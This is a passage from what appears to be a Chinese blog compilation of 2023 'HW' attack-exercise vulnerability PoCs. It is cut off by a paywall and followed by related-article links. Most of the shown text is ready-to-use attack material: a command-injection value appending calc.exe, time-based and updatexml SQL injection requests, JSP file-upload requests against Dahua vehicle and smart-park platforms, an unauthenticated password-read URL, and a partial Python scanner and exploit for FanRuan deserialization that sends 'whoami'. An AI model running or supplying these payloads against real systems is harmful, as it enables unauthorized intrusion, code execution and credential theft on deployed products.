Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-with: XMLHttpRequest
Content-Length: 134
Origin: <http://127.0.0.1>
Connection: close
Cookie: zentaosid=dhjpu2i3g5116j5eba85agl27f; lang=zh-cn; device=desktop; theme=default;tab=qa; windowwidth=1632; windowHeight=783
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

vsoft=kvm&hostType=physical&name=penson&extranet=127.0.0,1%7Ccalc.exe&cpuCores=2&memory=16&diskSize=16&desc=&uid=640be59da4851&type=za

31.辰信景云终端安全管理系统 login SQL注入漏洞

POST /api/user/login

captcha=&password=21232f297a57a5a743894a0e4a801fc3&username=admin'and(select*from(select+sleep(3))a)='

32.大华车载系统任意文件上传漏洞POC

POST /vehicleServer/carDev/icon/import/1?iconType=1 HTTP/1.1
Host: ip:port
Accept: */*
Accept-Encoding: gzip, deflate, br
Content-Length: 872
Content-Type: multipart/form-data; boundary=----63766573e5aegeegaa8cesaea4
User-Agent: Mozilla/5.0 (Windows NT 6.2: Win64: X64) Applewebkit/537.36 (KHTML, like Gecko) QtwebEngine/5.9.1 Chrome/56.0.2924.122 Safari/537.36

------63766573e5aegeegaa8cesaea4
Content-Disposition: form-data; name="file"; filename="test.jsp"
Content-ype: image/png

GIF89a
<%isp 马%>
------63766573e5ae9ee9aa8ce5aea4

获取路径:

GET /vehicleServer/carDev/icon/getIconList?nowTime=164605907220

33.大华智慧园区任意密码读取攻击

GET /admin/user_getUserInfoByUserName.action?userName=system

34.大华智慧园区综合管理平台 searchJson SQL注入漏洞

GET /portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(388609)),0x7e),1)--%22%7D/extend/%7B%7D HTTP/1.1
Host: 127.0.0.1:7443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip, deflate
Connection: close

35.大华智慧园区综合管理平台 文件上传漏洞

POST /publishing/publishing/material/file/video HTTP/1.1
Host: 127.0.0.1:7443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 804
Content-Type: multipart/form-data; boundary=dd8f988919484abab3816881c55272a7
Accept-Encoding: gzip, deflate
Connection: close

--dd8f988919484abab3816881c55272a7
Content-Disposition: form-data; name="Filedata"; filename="0EaE10E7dF5F10C2.jsp"

<%@page contentType="text/html; charset=GBK"%><%@page import="java.math.BigInteger"%><%@page import="java.security.MessageDigest"%><% MessageDigest md5 = null;md5 = MessageDigest.getInstance("MD5");String s = "123456";String miyao = "";String jiamichuan = s + miyao;md5.update(jiamichuan.getBytes());String md5String = new BigInteger(1, md5.digest()).toString(16);out.println(md5String);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
--dd8f988919484abab3816881c55272a7
Content-Disposition: form-data; name="poc"

poc
--dd8f988919484abab3816881c55272a7
Content-Disposition: form-data; name="Submit"

submit
--dd8f988919484abab3816881c55272a7--

36.帆软channel序列化

#!/usr/bin/env python
# -*- conding:utf-8 -*-
# 帆软channel接口反序列化
# Author: SXdysq

import base64
import requests
import urllib3
import concurrent.futures

urllib3.disable_warnings()

headers = {
    "Pragma": "no-cache",
    "Cache-Control": "no-cache",
    "Upgrade-Insecure-Requests": "1",
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3",
    "Accept-Language": "zh-CN,zh;q=0.9",
    "Connection": "close",
}

def check(host):
    try:
        burp0_url = host + "/webroot/decision/remote/design/channel"
        req = requests.get(burp0_url, headers=headers, verify=False, timeout=3)
        if "method 'GET' not supported" in req.text:
            req = requests.post(burp0_url, headers=headers, verify=False, timeout=3)
            if "如需访问请联系管理员" not in req.text:
                cmd(host)
            else:
                print("[o]", host, "------不存在漏洞!")
        else:
            print("[o]", host, "------不存在漏洞!")
    except Exception as e:
        print("[o]", host, "------不存在漏洞!")

def cmd(host):
    try:
        burp0_url = host + "/webroot/decision/remote/design/channel"
        burp0_headers = {"Content-Type": "application/x-www-form-urlencoded", "Testdmc": "whoami", "Testecho": "TestEcho"}
        b = b"H4sIAAAAAAAAAK1YCXwcVRn/z2Z3ZzKZXNum7bSAVGtJW7KDBUrZQKG5SugmrWzakqYYJrvTZMruzHZmtt144AWIeAEeWLwQhaiAUtAtULlEq4CoXB4geOOJFx4VofF7b3Y31zYt/Mxv82bee9/3f9/93pubn0fIddC4Q9+lR3OemY6eo7sjPXo2JD51/wPzLny0CoEuyGlbT3XpSc92ulHtjTiGO2KnU/nsWWeD/+2WqAmwfwI7KWlnotudqDdiOqmo7QxHR8whw7F0z4ga1rBpGVE3a0b7RrNGarOezhmNj3yk508HH7wmgEAcQY/GPSyNE4q23dE4ikYoWhlFYyQa42+NI7SLQXiIxJkOWlq3hrUNQzuMpNeaz5I0LbNIw3Ci7XYma1uG5THADZdpz9bu2HtcAHVbcUzSMYisM5P1RjmVa3qG22npQ2kjtRWREd3ttb3eXDq90bGzhuONbkXIdNcbo91QssWhRFa
最低0.47元/天 解锁文章
lurenjia404
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2023HW护网100+个漏洞poc
Yb528970805的博客
09-19 3217
20 . Metabase validate 远程命令执行漏洞CVE-2023-38646。13 . HiKVISION 综合安防管理平台 files 任意文件上传漏洞 POC。3 . Adobe ColdFusion 反序列化漏洞CVE-2023-29300。25 . Panabit iXCache网关RCE漏洞CVE-2023-38646。65 . 泛微E-Office9文件上传漏洞 CVE-2023-2523 POC。66 . 泛微E-Office9文件上传漏洞 CVE-2023-2648 POC
Coremail接口存配置读取漏洞POC
热门推荐
Sylon的博客
06-14 1万+
Coremail产品诞生于1999年,经过二十多年发展,如今从亿万级别的运营系统,到几万人的大型企业,都有了Coremail的客户。 截止2019年,Coremail邮件系统产品在国内已拥有10亿终端用户,是目前国内拥有邮箱使用用户最多的邮件系统。Coremail今天不但为网易(126、163、yeah)、移动,联通等知名运营商提供电子邮件整体技术解决方案及企业邮局运营服务,还为石油、钢铁、...
2023HW-8月(10-15)53个0day,1day漏洞汇总POCEXP
tangshuangsss的专栏
08-16 4568
点击"仙网攻城狮”关注我们哦~不当想研发的渗透人不是好运维让我们每天进步一点点简介2023HW-8月10-15号0day、1day漏洞汇总(已更新),包含以下漏洞需要自取。链接:https://pan.baidu.com/s/1Tr94yVFSHn_C6YiJcVprAw 提取码:6666通达OAsql注入漏洞 CVE-2023-4165 POC.. 2 通达OAsql注入漏洞 CVE-2023...
HW中常用的威胁情报中心
网络安全
06-11 941
攻防演习期间常用威胁情报中心,排名不分先后微步在线:https://x.threatbook.com/绿盟威胁分析中心:https://poma.nsfocus.com/奇安信威胁情报中心:https://ti.qianxin.com/360安全大脑:https://sc.360.net/360沙箱云地址“”https://ata.360.net/天际友盟RedQueen安全智能服务平台:ht...
神秘的HW到底是做什么的?一文带你了解
MachineGunJoe666
04-21 2372
国家级攻防演练从2016年开始,已经走过了6个年头,它是由公安部组织的,这个网络安全攻防演练集结了国家顶级的攻防力量,以不限制手段、路径,进行获取权限并攻陷指定靶机为目的实战攻防演练。 通过真实网络中的攻防演练,可以全面评估目标所在网络的整体安全防护能力,检验防守方安全监测、防护和应急响应机制及措施的有效性,锻炼应急响应队伍提升安全事件处置的能力。 攻防演练主要目标涵盖国家重要行业的关键信息基础设施、每年覆盖行业、单位、系统都在逐渐扩大。 这个攻防演练时间一般持续2到3周。一般护网演练
新云网站管理系统最新版注入漏洞
weixin_30216561的博客
06-11 256
受影响系统:新云网站管理系统最新版发现人的BLOG:http://sobiny.cn发现日期:2006年10月中旬发布日期:2007年6月上旬安全综述:新云网站管理系统是一个采用ASP和MSSQL等其他多种数据库生成静态页面构建的高效网站解决方案。漏洞描述:先看const.asp的GetUserTodayInfo过程。QUOTE:Lastlogin = Request.Cookies("newas...
Linux内核提权漏洞CVE-2023-32233复测及POC脚本
qq_18209847的博客
05-17 1586
近日,研究人员发现了Linux内核的NetFilter框架中的新漏洞(CVE-2023-32233)。问题的根源在于tfilter nf_tables是如何处理批处理请求的,经过身份验证的本地攻击者可通过发送特制的请求破坏Netfilter nf_tables的内部状态,从而获得更高权限。目前,研究人员还开发了一个PoC。注意:一旦在易受攻击的系统上启动了PoC(概念验证),该系统可能会处于不稳定状态,并且内核内存可能被破坏。我们强烈建议在专用系统上测试PoC,以避免可能的数据损坏。
2023HW漏洞POCEXP.zip
11-17
标题 "2023HW漏洞POCEXP.zip" 暗示了这是一个关于2023年某个名为“HW”的漏洞的证明概念(Proof of Concept, POC)和exploit(利用)的集合。POC安全研究人员或黑客为了证明一个安全漏洞确实存在而创建的代码或...
各大POC/EXP等合集
05-30
网络安全领域,POC(Proof of Concept)和EXPExploit)是两个非常重要的概念,它们对于理解网络攻击和防御机制至关重要。这个压缩包文件集合包含了大量的POCEXP文件,总计约2、3000个,为网络安全研究者提供了...
2023-HW-POC
09-20
【标题】2023-HW-POC 在IT领域,"POC"通常代表Proof of Concept(概念验证),这是一种技术演示,用于证明某个理论、想法或解决方案的有效性。2023-HW-POC很可能是针对硬件(HW)相关的一个概念验证项目。这个项目...
漏洞Poc知识库】一个网络安全爱好者对网络上一些漏洞poc的收录 .zip
04-22
漏洞Poc知识库】一个网络安全爱好者对网络上一些漏洞poc的收录 .zip
Some-PoC-oR-ExP:各种漏洞pocExp的收集或编写
04-28
总结起来,"Some-PoC-oR-ExP"是一个集成了多种漏洞PoCExp的资源库,主要使用Python语言实现,适用于安全研究和教育。通过深入研究这些实例,我们可以增进对漏洞本质的理解,提高安全防护意识,并且掌握安全编程...
开启我的配置管理记录~
zhf0425的专栏
09-25 385
学习配置管理已有两年,但是从未写过博客记录什么,从今天开始记录点点滴滴~
2023 HW 必修高危漏洞集合
holyxp的博客
07-21 3235
高危风险漏洞一直是企业网络安全防护的薄弱点,也成为 HW 攻防演练期间红队的重要突破口;每年 HW 期间爆发了大量的高危风险漏洞成为红队突破网络边界防护的一把利器,很多企业因为这些高危漏洞而导致整个防御体系被突破、甚至靶标失守而遗憾出局。HW 攻防演练在即,输出HW 必修高危漏洞手册,意在帮助企业在 HW 攻防演练的前期进行自我风险排查,降低因高危漏洞而“城池失守”的风险。
[HW必备]|蓝队防守必须排查的57个安全漏洞与解决方案
03-18 5166
一、OA系统 二、E-mail 三、Web中间件 四、源代码管理 五、项目管理系统 六、开源运维监控 七、堡垒机
【CVE复现计划】CVE-2023-23752
m0_63138919的博客
03-31 1027
本文以春秋云镜为靶场,进行该CVE-2023-23752的漏洞原理学习,记录自己学习过程,还请大佬们师傅们指出文中错误
从零开始做题:logtime
weixin_44626085的博客
07-10 252
给出1个pcapng文件
vue2 实现原生 WebSocket
最新发布
weixin_38797742的博客
07-11 389
原生WebSocket: new WebSocket。
漏洞细节、pocexp 已在互联网上流传
12-16
漏洞细节、POC(Proof of Concept)以及EXPExploit)是指揭示和证明系统中存在的漏洞的详细信息、漏洞利用和利用脚本。这些信息通常是研究人员或黑客根据自己的研究和测试发现的,并在互联网上公开分享。 泄露漏洞细节、POCEXP在一定程度上可以促进信息安全领域的发展。通过公开这些信息,可以让用户和厂商了解系统的安全问题,进而采取相应的防护措施和修复漏洞。这有助于增强系统的安全性,并推动整个安全行业的进步。 然而,漏洞细节、POCEXP的公开也存在一些风险和问题。首先,黑客可以利用这些信息对系统进行攻击,从而造成安全威胁。其次,厂商可能不及时修复漏洞,导致用户信息泄露或其他损失。此外,某些黑客可能使用这些信息进行非法活动,危害他人。 因此,在公开漏洞细节、POCEXP之前,我们需要权衡风险和利益。对于研究人员来说,他们应该遵守道德和法律规定,在公开之前与相关方协商,并按照合适的方式发布信息。对于厂商和用户来说,他们应及时关注漏洞信息,采取相应的安全措施,如及时升级补丁、增强防护措施等。 总之,漏洞细节、POCEXP在互联网上流传的现象存在一定的利与弊。合理的披露和利用可以推动整个信息安全领域的进步,但也需要各方共同关注和努力,以确保漏洞信息的安全和可持续发展。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值